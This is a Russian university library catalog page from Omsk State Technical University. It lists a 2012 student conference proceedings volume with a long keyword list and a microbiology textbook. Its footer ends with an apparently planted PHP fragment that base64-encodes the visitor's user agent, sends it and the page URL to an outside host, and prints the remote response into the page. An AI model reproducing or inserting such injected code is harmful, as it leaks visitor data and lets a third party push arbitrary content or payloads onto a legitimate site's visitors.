ПОВЕРХНОСТНОЕ -- НАТЯЖЕНИЕ -- МЫЛО -- ПРУЖИНА -- УПРУГОСТЬ -- ТЕНЗОДАТЧИК
Держатели документа (Информация об экземплярах) 
Полный текст
19. 
Актуальные проблемы современной науки [Текст] : материалы межвуз. науч.-практ. конф. студентов (Омск, 26 апр. 2012 г.) / ОмГТУ, 2012. - 137 с.
Ключевые слова 
ОМПИ -- ОМГТУ -- ОМСК -- КОНФЕРЕНЦИЯ -- КЕРАМИКА -- ВЫСОКОТЕМПЕРАТУРНАЯ -- СВЕРХПРОВОДЯЩАЯ -- ПОЛУЧЕНИЕ -- РАБОТОСПОСОБНОСТЬ -- МЕТАЛЛОРЕЖУЩИЙ -- ИНСТРУМЕНТ -- ПОВЕРХНОСТЬ -- МОДИФИКАЦИЯ -- ПРЕССОВАНИЕ -- УЛЬТРАЗВУКОВОЕ -- ПОЛИМЕРНЫЙ -- КОМПОЗИЦИОННЫЙ -- МАТЕРИАЛ -- ИЗМЕНЕНИЕ -- СТРУКТУРА -- ТВЕРДОЕ -- ТЕЛО -- ДЕФЕКТ -- ТОЧЕЧНЫЙ -- ДИФФУЗИОННЫЙ -- ПРОЦЕСС -- КОМПОЗИТ -- ДВУХКОМПОНЕНТНЫЙ -- ЭЛЕКТРИЧЕСКОЕ -- СВОЙСТВО -- ОЦЕНКА -- КОНСТРУКЦИОННЫЙ -- ТРЕЩИНОУСТОЙЧИВОСТЬ -- ПРОГНОЗИРОВАНИЕ -- НАСОС -- ЦЕНТРОБЕЖНЫЙ -- ПОГРУЗНОЙ -- СТОЙКОСТЬ -- КОРРОЗИОННАЯ -- УЗЕЛ -- ДЕТАЛЬ -- СТАЛЬ 40ХС -- ИССЛЕДОВАНИЕ -- МОДИФИЦИРОВАНИЕ -- ФРИКЦИОННО-ЭЛЕКТРИЧЕСКОЕ -- ЭЛЕКТРИЧЕСКОЕ -- ФРИКЦИОННОЕ -- НАНОМЕТРОВОЕ -- ПРОСТРАНСТВЕННОЕ -- РАЗРЕШЕНИЕ -- РАЗДЕЛ -- ГРАНИЦА -- ИЗОЛЯТОР-ИЗОЛЯТОР -- ИЗОЛЯТОР-МЕТАЛЛ -- МЕТАЛЛ -- ПРОВОДИМОСТЬ -- ВОССТАНОВЛЕНИЕ -- ИЗНОШЕННАЯ -- АВИАЦИОННЫЙ -- ДВИГАТЕЛЬ -- ТИТАНОВЫЙ -- СПЛАВ ВТЗ-1 -- ГАЗОПОРОШКОВАЯ -- ЛАЗЕРНАЯ -- НАПЛАВКА -- ДВИГАТЕЛЕСТРОЕНИЕ -- ИЗДЕЛИЕ -- РЕЗИНОТЕХНИЧЕСКОЕ -- ИЗНОСОСТОЙКОСТЬ -- ВОЗДУХ -- МИКРОФЛОРА -- НАНОПРОДУКТ -- РЫНОК -- УЛЬТРАТОНКАЯ -- ФЕРРОМАГНИТНАЯ -- ПЛЕНКА -- СВОЙСТВО -- МАГНИТНОЕ -- АДСОРБЦИОННОЕ -- ОБОЛОЧЕЧНАЯ -- СТРУКТУРА -- ЭЛЕКТРОН -- МЕТАЛЛИЧЕСКИЙ -- НАНОКЛАСТЕР -- СКАНИРУЮЩАЯ -- ЗОНДОВАЯ -- МИКРОСКОПИЯ -- ПРОФИЛОГРАФ -- НАНОЭДЬЮКАТОР -- МОДЕЛИРОВАНИЕ -- КОМПЬЮТЕРНОЕ -- АДСОРБЦИОННАЯ -- ДВУМЕРНАЯ -- УПОРЯДОЧЕНИЕ -- СТРУКТУРНОЕ -- МАГНИТНОЕ -- ОСВЕТИТЕЛЬНАЯ -- ЛЮМИНЕСЦЕНТНАЯ -- АППАРАТУРА -- ОПТИЧЕСКИЙ -- МЕТОД -- СВЕТОТЕХНИКА -- ФИЗИЧЕСКАЯ -- ЗАДАЧА -- РЕШЕНИЕ -- ЧИСЛЕННЫЙ -- КАЧЕСТВО -- КОНТРОЛЬ -- СВЕТ -- ВЕЩЕСТВО -- ВЗАИМОДЕЙСТВИЕ -- НЕРАЗРУШАЮЩИЙ -- АКУСТИЧЕСКИЙ -- РЕНОРМГРУППОВОЕ -- ОПИСАНИЕ -- ФАЗОВЫЙ -- ПЕРЕХОД -- ФИЗИЧЕСКИЙ -- ЦВЕТОВОСПРОИЗВЕДЕНИЕ -- СЕГНЕТОЭЛЕКТРИК -- ИЗЛУЧЕНИЕ -- ЭЛЕКТРОМАГНИТНОЕ -- ЗАЩИТА -- ЭЛИТНОЕ -- ОБРАЗОВАНИЕ -- ЯМР -- СПЕКТРОСКОПИЯ -- ВСЕЛЕННАЯ -- ТЕПЛОВАЯ -- СМЕРТЬ -- ЖИДКОКРИСТАЛЛИЧЕСКОЕ -- СОСТОЯНИЕ -- ПРИРОДА -- ТЕХНИКА -- ОБРАЗОВАТЕЛЬНАЯ -- ПРОГРАММА -- УЧЕБНАЯ -- ДЕЯТЕЛЬНОСТЬ -- МОТИВАЦИЯ -- ТЕМПЕРАТУРА -- РАСПРЕДЕЛЕНИЕ -- ИМПУЛЬСНЫЙ -- НАГРЕВ -- ГАЗ -- МАТЕРИЯ -- СТРОЕНИЕ -- КВАРКОВАЯ -- МОДЕЛЬ -- СТАРЕНИЕ -- НАРУШЕНИЕ -- ФЛУКТУАЦИОННО-ДИССИПАТИВНАЯ -- ТЕОРЕМА -- ФЛУКТУАЦИОННАЯ -- ДИССИПАТИВНАЯ -- СИСТЕМА -- НЕУПОРЯДОЧЕННАЯ -- USB -- СВЕТ -- ТЕАТРАЛЬНЫЙ -- СЦЕНИЧЕСКИЙ -- УПРАВЛЕНИЕ -- МОТИВ -- АККУМУЛЯТОР -- ВЫСОКОЭФФЕКТИВНЫЙ -- ТЕМНАЯ -- ЭНЕРГИЯ -- ЧЕРНАЯ -- ДЫРА
Оглавление 
Держатели документа (Информация об экземплярах) 
Полный текст
20. 
Мудрецова-Висс, Клавдия Алексеевна. Микробиология, санитария и гигиена [Текст] : Учеб. для вузов по специальностям: "Товароведение и экспертиза товаров", "Технология продуктов общественного питания", "Стандартизация и сертификация" / К. А. Мудрецова-Висс, А. А. Кудряшова, В. П. Дедюхина, 2001. - 378 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2961 - 19.07.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.00 с.12 запросов, 0.53c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;